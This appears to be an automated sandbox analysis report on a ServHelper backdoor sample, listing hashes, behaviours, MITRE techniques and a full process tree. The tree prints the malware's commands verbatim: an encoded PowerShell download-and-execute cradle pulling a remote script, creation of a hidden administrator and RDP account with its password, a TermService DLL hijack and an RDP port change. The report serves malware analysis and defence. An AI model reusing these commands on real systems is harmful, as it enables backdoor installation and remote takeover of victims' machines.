servhelper | fe65170a6f6cd5ba0df997262bca40350b650067db206bc83bfaf80da94bba9e

Analysis

max time kernel
132s
max time network
150s
platform
windows7_x64
resource
win7v20210410
submitted
13-07-2021 01:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f250cb14a5ab5ada5aa6d9d18a20b075.exe
Size

491KB
MD5

f250cb14a5ab5ada5aa6d9d18a20b075
SHA1

789475ac6d5fda814f46a26246d0f931f41b6ba3
SHA256

fe65170a6f6cd5ba0df997262bca40350b650067db206bc83bfaf80da94bba9e
SHA512

f3119126a9c29e71f1c2eb531e61bde10eb713f3e46128d4dabddde8b54152555490b51eabbfcfc82c7906cf439124e16cb26f50e939e88d830ba048c4008147

Score

10^/10

servhelper backdoor discovery exploit persistence spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper

Core1 .NET packer 1 IoCs

Detects packer/loader used by .NET malware.

resource	yara_rule
behavioral1/memory/1724-85-0x000000001CF30000-0x000000001D3D5000-memory.dmp	Core1

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 1 IoCs

flow	pid	Process
16	320	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
1724	W8k35SR3dQ.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
1464	takeown.exe
1524	icacls.exe
676	icacls.exe
1012	icacls.exe
1572	icacls.exe
1300	icacls.exe
1880	icacls.exe
1152	icacls.exe

Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00060000000130fa-214.dat	upx
behavioral1/files/0x00060000000130fb-215.dat	upx

Deletes itself 1 IoCs

pid	Process
924	cmd.exe

Loads dropped DLL 10 IoCs

pid	Process
1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe
1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe
1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe
1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe
1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe
1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe
1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe
1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe
916	Process not Found
916	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1464	takeown.exe
1524	icacls.exe
676	icacls.exe
1012	icacls.exe
1572	icacls.exe
1300	icacls.exe
1880	icacls.exe
1152	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 736 set thread context of 1336	736	f250cb14a5ab5ada5aa6d9d18a20b075.exe	29
PID 1724 set thread context of 1548	1724	W8k35SR3dQ.exe	35

Drops file in Windows directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a9f13a61-7e27-4f15-9a4d-ad33bbb27cc4	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KSF8EI29CHKH11I1QZU0.temp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_37980a1e-b761-44f1-b078-06d73cf43ae7	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_050ce121-b443-4eec-b854-87e3d99d4d3b	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8f10b6fd-976d-4838-acc9-cb565ea53f38	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2ac330c7-4441-46b0-a5ce-73d4dd19ca8f	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f2625263-911c-41b1-8fc5-3ebfaa0ddd88	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_72402745-a2dd-410e-8122-4d34f5c39aa5	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7fb3f651-72bb-425b-86f6-7f3cde373241	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1f81c6c5-b3dc-4b65-b087-38f6e6fc9a84	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_191c4cac-e01b-454d-ad8b-59f3abbead80	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1f08379e-cbc4-4b3a-a01f-643731c1fb8c	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
756	timeout.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c08af2838577d701	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1360	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	f250cb14a5ab5ada5aa6d9d18a20b075.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	f250cb14a5ab5ada5aa6d9d18a20b075.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
960	powershell.exe
960	powershell.exe
1880	powershell.exe
1880	powershell.exe
1796	powershell.exe
1796	powershell.exe
1288	powershell.exe
1288	powershell.exe
960	powershell.exe
960	powershell.exe
960	powershell.exe
320	powershell.exe
320	powershell.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
468	Process not Found
916	Process not Found
916	Process not Found
916	Process not Found

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	736	f250cb14a5ab5ada5aa6d9d18a20b075.exe
Token: SeDebugPrivilege	960	powershell.exe
Token: SeDebugPrivilege	1880	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeRestorePrivilege	676	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	1012	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1012	WMIC.exe
Token: SeAuditPrivilege	1012	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1012	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1012	WMIC.exe
Token: SeAuditPrivilege	1012	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1324	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1324	WMIC.exe
Token: SeAuditPrivilege	1324	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1324	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1324	WMIC.exe
Token: SeAuditPrivilege	1324	WMIC.exe
Token: SeDebugPrivilege	320	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 736 wrote to memory of 1336	736	f250cb14a5ab5ada5aa6d9d18a20b075.exe	29
PID 736 wrote to memory of 1336	736	f250cb14a5ab5ada5aa6d9d18a20b075.exe	29
PID 736 wrote to memory of 1336	736	f250cb14a5ab5ada5aa6d9d18a20b075.exe	29
PID 736 wrote to memory of 1336	736	f250cb14a5ab5ada5aa6d9d18a20b075.exe	29
PID 736 wrote to memory of 1336	736	f250cb14a5ab5ada5aa6d9d18a20b075.exe	29
PID 736 wrote to memory of 1336	736	f250cb14a5ab5ada5aa6d9d18a20b075.exe	29
PID 736 wrote to memory of 1336	736	f250cb14a5ab5ada5aa6d9d18a20b075.exe	29
PID 736 wrote to memory of 1336	736	f250cb14a5ab5ada5aa6d9d18a20b075.exe	29
PID 736 wrote to memory of 1336	736	f250cb14a5ab5ada5aa6d9d18a20b075.exe	29
PID 736 wrote to memory of 1336	736	f250cb14a5ab5ada5aa6d9d18a20b075.exe	29
PID 1336 wrote to memory of 1724	1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe	31
PID 1336 wrote to memory of 1724	1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe	31
PID 1336 wrote to memory of 1724	1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe	31
PID 1336 wrote to memory of 1724	1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe	31
PID 1336 wrote to memory of 924	1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe	32
PID 1336 wrote to memory of 924	1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe	32
PID 1336 wrote to memory of 924	1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe	32
PID 1336 wrote to memory of 924	1336	f250cb14a5ab5ada5aa6d9d18a20b075.exe	32
PID 924 wrote to memory of 756	924	cmd.exe	34
PID 924 wrote to memory of 756	924	cmd.exe	34
PID 924 wrote to memory of 756	924	cmd.exe	34
PID 924 wrote to memory of 756	924	cmd.exe	34
PID 1724 wrote to memory of 1548	1724	W8k35SR3dQ.exe	35
PID 1724 wrote to memory of 1548	1724	W8k35SR3dQ.exe	35
PID 1724 wrote to memory of 1548	1724	W8k35SR3dQ.exe	35
PID 1724 wrote to memory of 1548	1724	W8k35SR3dQ.exe	35
PID 1724 wrote to memory of 1548	1724	W8k35SR3dQ.exe	35
PID 1724 wrote to memory of 1548	1724	W8k35SR3dQ.exe	35
PID 1724 wrote to memory of 1548	1724	W8k35SR3dQ.exe	35
PID 1724 wrote to memory of 1548	1724	W8k35SR3dQ.exe	35
PID 1724 wrote to memory of 1548	1724	W8k35SR3dQ.exe	35
PID 1724 wrote to memory of 1548	1724	W8k35SR3dQ.exe	35
PID 1724 wrote to memory of 1548	1724	W8k35SR3dQ.exe	35
PID 1548 wrote to memory of 960	1548	vbc.exe	36
PID 1548 wrote to memory of 960	1548	vbc.exe	36
PID 1548 wrote to memory of 960	1548	vbc.exe	36
PID 960 wrote to memory of 2012	960	powershell.exe	38
PID 960 wrote to memory of 2012	960	powershell.exe	38
PID 960 wrote to memory of 2012	960	powershell.exe	38
PID 2012 wrote to memory of 676	2012	csc.exe	39
PID 2012 wrote to memory of 676	2012	csc.exe	39
PID 2012 wrote to memory of 676	2012	csc.exe	39
PID 960 wrote to memory of 1880	960	powershell.exe	40
PID 960 wrote to memory of 1880	960	powershell.exe	40
PID 960 wrote to memory of 1880	960	powershell.exe	40
PID 960 wrote to memory of 1796	960	powershell.exe	42
PID 960 wrote to memory of 1796	960	powershell.exe	42
PID 960 wrote to memory of 1796	960	powershell.exe	42
PID 960 wrote to memory of 1288	960	powershell.exe	44
PID 960 wrote to memory of 1288	960	powershell.exe	44
PID 960 wrote to memory of 1288	960	powershell.exe	44
PID 960 wrote to memory of 1464	960	powershell.exe	47
PID 960 wrote to memory of 1464	960	powershell.exe	47
PID 960 wrote to memory of 1464	960	powershell.exe	47
PID 960 wrote to memory of 1524	960	powershell.exe	48
PID 960 wrote to memory of 1524	960	powershell.exe	48
PID 960 wrote to memory of 1524	960	powershell.exe	48
PID 960 wrote to memory of 676	960	powershell.exe	49
PID 960 wrote to memory of 676	960	powershell.exe	49
PID 960 wrote to memory of 676	960	powershell.exe	49
PID 960 wrote to memory of 1012	960	powershell.exe	50
PID 960 wrote to memory of 1012	960	powershell.exe	50
PID 960 wrote to memory of 1012	960	powershell.exe	50
PID 960 wrote to memory of 1572	960	powershell.exe	51

C:\Users\Admin\AppData\Local\Temp\f250cb14a5ab5ada5aa6d9d18a20b075.exe
"C:\Users\Admin\AppData\Local\Temp\f250cb14a5ab5ada5aa6d9d18a20b075.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:736
- C:\Users\Admin\AppData\Local\Temp\f250cb14a5ab5ada5aa6d9d18a20b075.exe
  C:\Users\Admin\AppData\Local\Temp\f250cb14a5ab5ada5aa6d9d18a20b075.exe
  2⤵
  - Loads dropped DLL
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:1336
- - C:\Users\Admin\AppData\Local\Temp\W8k35SR3dQ.exe
    "C:\Users\Admin\AppData\Local\Temp\W8k35SR3dQ.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:1724
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1548
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        5⤵
        Drops file in System32 directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:960
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wodaned3\wodaned3.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2012
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES38DC.tmp" "c:\Users\Admin\AppData\Local\Temp\wodaned3\CSCE726257D8FD54ECDA08F58F07862EB95.TMP"
        7⤵
        
        PID:676
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1880
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1796
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1288
      - C:\Windows\system32\takeown.exe
        
        "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1464
      - C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1524
      - C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:676
      - C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1012
      - C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1572
      - C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1300
      - C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1880
      - C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1152
      - C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        6⤵
        
        PID:1536
      - C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        6⤵
        Modifies registry key
        
        PID:1360
      - C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        6⤵
        
        PID:672
      - C:\Windows\system32\net.exe
        
        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        6⤵
        
        PID:564
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        7⤵
        
        PID:1204
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        6⤵
        
        PID:1684
        
        C:\Windows\system32\cmd.exe
        
        cmd /c net start rdpdr
        7⤵
        
        PID:1796
        
        C:\Windows\system32\net.exe
        
        net start rdpdr
        8⤵
        
        PID:1044
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        9⤵
        
        PID:864
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        6⤵
        
        PID:1440
        
        C:\Windows\system32\cmd.exe
        
        cmd /c net start TermService
        7⤵
        
        PID:868
        
        C:\Windows\system32\net.exe
        
        net start TermService
        8⤵
        
        PID:1464
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        9⤵
        
        PID:1524
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        6⤵
        
        PID:1464
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
        6⤵
        
        PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\f250cb14a5ab5ada5aa6d9d18a20b075.exe"
    3⤵
    - Deletes itself
    - Suspicious use of WriteProcessMemory
    PID:924
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /T 10 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:756

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:332
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:1364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:940

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc UAA3pim3 /add
1⤵
PID:1276
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc UAA3pim3 /add
  2⤵
  PID:1780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc UAA3pim3 /add
    3⤵
    PID:1676

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:1956
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:1796
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:1308

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
1⤵
PID:1012
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
  2⤵
  PID:1364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
    3⤵
    PID:1368

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1728
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:1780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:1676

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc UAA3pim3
1⤵
PID:1496
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc UAA3pim3
  2⤵
  PID:1796
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc UAA3pim3
    3⤵
    PID:1308

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:268
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1012

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:1780
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1324

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1544
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
